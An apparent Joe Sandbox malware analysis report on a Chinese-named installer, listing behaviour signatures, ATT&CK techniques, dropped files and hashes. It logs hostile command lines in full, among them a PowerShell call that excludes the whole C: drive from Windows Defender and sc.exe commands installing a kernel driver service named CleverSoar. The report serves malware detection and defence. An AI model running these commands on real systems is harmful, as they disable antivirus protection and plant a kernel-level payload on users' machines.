Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CA6EFA1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_6CA6EFA1
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CA67ADD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_6CA67ADD

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
Source: tProtect.dll.12.drStatic PE information: Found potential injection code
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpProcess created: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe "C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= autoJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoarJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CB35720 cpuid 6_2_6CB35720
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0038AB2A GetSystemTimeAsFileTime,10_2_0038AB2A
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00420090 GetVersion,10_2_00420090
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.1920433392.0000000000B5F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Windows Defender\MsMpEng.exe
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter
1
Windows Service
1
Access Token Manipulation
11
Masquerading
OS Credential Dumping1
System Time Discovery
Remote Services1
Archive Collected Data
1
Encrypted Channel
Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts1
Service Execution
1
DLL Side-Loading
1
Windows Service
1
Disable or Modify Tools
LSASS Memory331
Security Software Discovery
Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Native API
Logon Script (Windows)111
Process Injection
231
Virtualization/Sandbox Evasion
Security Account Manager231
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
DLL Side-Loading
1
Access Token Manipulation
NTDS2
Process Discovery
Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script111
Process Injection
LSA Secrets1
Application Window Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Deobfuscate/Decode Files or Information
Cached Domain Credentials2
System Owner/User Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
Obfuscated Files or Information
DCSync3
File and Directory Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
Software Packing
Proc Filesystem25
System Information Discovery
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
DLL Side-Loading
/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1579419 Sample: #U8f6f#U4ef6#U5305#U5b89#U8... Startdate: 22/12/2024 Architecture: WINDOWS Score: 80 90 Found driver which could be used to inject code into processes 2->90 92 PE file contains section with special chars 2->92 94 AI detected suspicious sample 2->94 96 Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet 2->96 10 #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe 2 2->10         started        13 cmd.exe 2->13         started        15 cmd.exe 2->15         started        17 32 other processes 2->17 process3 file4 86 #U8f6f#U4ef6#U5305...a0b#U5e8f_1.0.4.tmp, PE32 10->86 dropped 19 #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp 3 5 10->19         started        23 sc.exe 1 13->23         started        25 sc.exe 1 15->25         started        27 sc.exe 1 17->27         started        29 sc.exe 1 17->29         started        31 sc.exe 1 17->31         started        33 28 other processes 17->33 process5 file6 72 C:\Users\user\AppData\Local\...\update.vac, PE32 19->72 dropped 74 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 19->74 dropped 98 Adds a directory exclusion to Windows Defender 19->98 35 #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe 2 19->35         started        38 powershell.exe 23 19->38         started        41 conhost.exe 23->41         started        43 conhost.exe 25->43         started        45 conhost.exe 27->45         started        47 conhost.exe 29->47         started        49 conhost.exe 31->49         started        51 conhost.exe 33->51         started        53 27 other processes 33->53 signatures7 process8 file9 76 #U8f6f#U4ef6#U5305...a0b#U5e8f_1.0.4.tmp, PE32 35->76 dropped 55 #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp 4 16 35->55         started        100 Loading BitLocker PowerShell Module 38->100 59 conhost.exe 38->59         started        61 WmiPrvSE.exe 38->61         started        signatures10 process11 file12 78 C:\Users\user\AppData\Local\...\update.vac, PE32 55->78 dropped 80 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 55->80 dropped 82 C:\Program Files (x86)\...\updat4.vac, PE32 55->82 dropped 84 3 other files (none is malicious) 55->84 dropped 102 Query firmware table information (likely to detect VMs) 55->102 104 Protects its processes via BreakOnTermination flag 55->104 106 Hides threads from debuggers 55->106 108 Contains functionality to hide a thread from the debugger 55->108 63 7zr.exe 2 55->63         started        66 7zr.exe 6 55->66         started        signatures13 process14 file15 88 C:\Program Files (x86)\...\tProtect.dll, PE32+ 63->88 dropped 68 conhost.exe 63->68         started        70 conhost.exe 66->70         started        process16

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe6%VirustotalBrowse
#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe0%ReversingLabs
SourceDetectionScannerLabelLink
C:\Program Files (x86)\Windows NT\7zr.exe0%ReversingLabs
C:\Program Files (x86)\Windows NT\is-7F262.tmp0%ReversingLabs
C:\Program Files (x86)\Windows NT\tProtect.dll3%ReversingLabs
C:\Program Files (x86)\Windows NT\trash (copy)0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-0UFV8.tmp\_isetup\_setup64.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-ONGLN.tmp\_isetup\_setup64.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp0%ReversingLabs
No Antivirus matches
No Antivirus matches
No Antivirus matches
No contacted domains info
NameSourceMaliciousAntivirus DetectionReputation
https://aria2.github.io/Usage:#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004819000.00000004.00001000.00020000.00000000.sdmp, is-7F262.tmp.6.drfalse
    unknown
    https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exefalse
      high
      https://github.com/aria2/aria2/issuesReport#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004819000.00000004.00001000.00020000.00000000.sdmp, is-7F262.tmp.6.drfalse
        high
        http://www.metalinker.org/#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004819000.00000004.00001000.00020000.00000000.sdmp, is-7F262.tmp.6.drfalse
          unknown
          https://www.remobjects.com/ps#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe, 00000000.00000003.1704613298.000000007F64B000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe, 00000000.00000003.1704203075.0000000003460000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000000.1706263818.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000000.1769046154.0000000000F4D000.00000020.00000001.01000000.00000008.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.0.dr, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.5.drfalse
            high
            https://aria2.github.io/#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004819000.00000004.00001000.00020000.00000000.sdmp, is-7F262.tmp.6.drfalse
              unknown
              https://github.com/aria2/aria2/issues#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004819000.00000004.00001000.00020000.00000000.sdmp, is-7F262.tmp.6.drfalse
                high
                https://www.innosetup.com/#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe, 00000000.00000003.1704613298.000000007F64B000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe, 00000000.00000003.1704203075.0000000003460000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000000.1706263818.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000000.1769046154.0000000000F4D000.00000020.00000001.01000000.00000008.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.0.dr, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.5.drfalse
                  high
                  http://www.metalinker.org/basic_string::_M_construct#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004819000.00000004.00001000.00020000.00000000.sdmp, is-7F262.tmp.6.drfalse
                    unknown
                    No contacted IP infos
                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1579419
                    Start date and time:2024-12-22 09:34:06 +01:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 8m 52s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:112
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Critical Process Termination
                    Sample name:#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe
                    renamed because original name is a hash value
                    Original Sample Name:_1.0.4.exe
                    Detection:MAL
                    Classification:mal80.evad.winEXE@146/32@0/0
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 74%
                    • Number of executed functions: 121
                    • Number of non-executed functions: 108
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Exclude process from analysis (whitelisted): Conhost.exe
                    • Excluded IPs from analysis (whitelisted): 52.149.20.212
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size exceeded maximum capacity and may have missing disassembly code.
                    • Report size getting too big, too many NtCreateKey calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    TimeTypeDescription
                    03:35:03API Interceptor18x Sleep call for process: powershell.exe modified
                    No context
                    No context
                    No context
                    No context
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    C:\Program Files (x86)\Windows NT\7zr.exeekTL8jTI4D.msiGet hashmaliciousUnknownBrowse
                      Process:C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp
                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):831200
                      Entropy (8bit):6.671005303304742
                      Encrypted:false
                      SSDEEP:24576:A48I9t/zu2QSM0TMzOCkY+we/86W5gXKxZ5:Ae71MzuiehWIKxZ
                      MD5:84DC4B92D860E8AEA55D12B1E87EA108
                      SHA1:56074A031A81A2394770D4DA98AC01D99EC77AAD
                      SHA-256:BA1EC2C30212F535231EBEB2D122BDA5DD0529D80769495CCFD74361803E3880
                      SHA-512:CF3552AD1F794582F406FB5A396477A2AA10FCF0210B2F06C3FC4E751DB02193FB9AA792CD994FA398462737E9F9FFA4F19F095A82FC48F860945E98F1B776B7
                      Malicious:false
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 0%
                      Joe Sandbox View:
                      • Filename: ekTL8jTI4D.msi, Detection: malicious, Browse
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9A..} ..} ..} ...<... ...?..~ ...<..t ...?..v ...?... ...(.| ..} ... ...(.t ..K.... ..k_..~ ..K...~ ..f."._ ...R..x ...&..| ..Rich} ..........PE..L....\.d.....................N......:.............@..........................@............@.....................................x........................&.......d......................................................H............................text.............................. ..`.rdata..RZ.......\..................@..@.data...ds... ......................@....sxdata.............................@....rsrc...............................@..@.reloc..2r.......t..................@..B................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp
                      File Type:data
                      Category:dropped
                      Size (bytes):249968
                      Entropy (8bit):7.999303164107087
                      Encrypted:true
                      SSDEEP:6144:kCH0RnlXrWzuIqJSkqQQhY1il1J4TpHQQh:d0RnlXDPqQGY1s1JuHQQh
                      MD5:2362DBE94C48B5F9BEC71C9C0A2AB15A
                      SHA1:B1A57A8FCC57D0230B5AD2CB56BBBD4DDFC9E1C9
                      SHA-256:D17B942BE633F5DE2C57DA7A62B0A788D85DCAFA6C9BA48CCBFB6FD403277288
                      SHA-512:7FC92664D53E2E5D8F624F4AF6E902B1ECD86EFF03F8192AF09FDC5899576DDA9EC8F7DC4906237207AB758EFF4142A19DA2D8622BD329A0AA7324CC307FE695
                      Malicious:false
                      Preview:.@S.....?..,................H..v\t4..{@.Ae.RIm...w..8Q.........G..W..7..x.mX.-....Yg..x.2"l..,...yFP;...D?b.......m...!(M.Y..5.*qk..3.j.U.2......!i..$.s.I.W..i.......zQ....X..E*o.I.._..>"...O.@....S8..L1X.P....3_.C.,H`.........zmp ...x..........4_...E.`X{7.T.@e.1.>...v. .......u8.;...z...w...n.....v*.....o%...v.N](....P..2...z..G.r.^.;U/...kN....1tEn.i..F....q.u..y[.....B..%C.S3..X....B....&H.e....o.T..{...=.+6uq._..y.....i.7.%"w#...I...k.n.5..r.'l....u.......m.M.v.6.}.....U.*Jp<.}.?k... .$.*./.f!R......N....Sr......ys..&....m...'PG.:c...*f.7.....v.j.'.4.'W..$.F.g......LV...FL!!4.$QG.K..v..SZv.....{a..,u.%..{9....~MR.>..e.<.......20..GI.........x..IB.n5..C.G....@w..a......[.R.a.Y Np."........*.b...m..4P...1C...M....*.{>^..e...-c..N.BS.e...*.Wr.a._......V.Y..D.l..<;.HZ'.\.../..G.i.=......*..k...h..j.....r.%+!.V...p.vgQf....Z*.h<.Q[~g..}^.iH]..........J.<....<K.G.(.C....`....ry.....v..Wu>....r1u..ZA.".d..LAQ.F..._...#..Y&.....~.J...
                      Process:C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp
                      File Type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
                      Category:dropped
                      Size (bytes):5649408
                      Entropy (8bit):6.392614480390128
                      Encrypted:false
                      SSDEEP:98304:jgRfP5jnFTyGZEWxSIBHVGT+t1ufqchZ:kRZDFTyGaHIJoWofqc
                      MD5:8C71B86BF407C05BAF11E8D296B9C8B8
                      SHA1:6624AB8CA883C48F02C58250D4EEE9E90098F4E4
                      SHA-256:BE2099C214F63A3CB4954B09A0BECD6E2E34660B886D4C898D260FEBFE9D70C2
                      SHA-512:BB3FEE727E40F8213F0A7D9808048E341295A684ECBA6F4DF52F1B07B528D7206CA41926B2433F4B63451565AD2854570FEE976BC7051B629ACD24FCA6D0F507
                      Malicious:false
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 0%
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................&.ZF..0V..<.............@..............................V.....L.V...`... ...............................................V../...........0O..............`V.\a...........................vL.(.....................V..............................text....XF......ZF.................`..`.data....z...pF..|...^F.............@....rdata.. 9....F..:....F.............@..@.pdata.......0O.......O.............@..@.xdata........Q.......Q.............@..@.bss.....;....U..........................idata.../....V..0....U.............@....CRT....h....@V.......U.............@....tls.........PV.......U.............@....reloc..\a...`V..b....U.............@..B................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp
                      File Type:data
                      Category:dropped
                      Size (bytes):249968
                      Entropy (8bit):7.999303164107087
                      Encrypted:true
                      SSDEEP:6144:kCH0RnlXrWzuIqJSkqQQhY1il1J4TpHQQh:d0RnlXDPqQGY1s1JuHQQh
                      MD5:2362DBE94C48B5F9BEC71C9C0A2AB15A
                      SHA1:B1A57A8FCC57D0230B5AD2CB56BBBD4DDFC9E1C9
                      SHA-256:D17B942BE633F5DE2C57DA7A62B0A788D85DCAFA6C9BA48CCBFB6FD403277288
